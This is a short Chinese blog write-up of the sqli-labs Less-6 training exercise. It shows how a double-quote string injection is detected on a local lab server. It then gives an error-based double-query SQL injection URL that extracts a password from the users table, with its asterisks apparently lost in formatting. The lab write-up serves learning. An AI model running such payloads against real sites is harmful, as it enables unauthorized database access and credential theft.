sqli-labs：Less-6

Less 6实验主要是：字符型、双引号、报错注入、双注入

首先输入：http://localhost/Less-5/?id=1' 无报错信息

输入http://localhost/Less-5/?id=1" 此时出现报错信息

这个实验和Less 5的原理差不多，输入:
http://localhost/Less-6/?id=1" union select count(),1,concat((floor(rand(0)2)),';',(select password from users limit 1,1))name from mysql.user group by name; %23
可以爆出数据库中的信息

posted @ 2020-03-30 22:22 tangjf10 阅读(222) 评论(0) 编辑收藏举报

刷新页面返回顶部

tangjf10

sqli-labs：Less-6

公告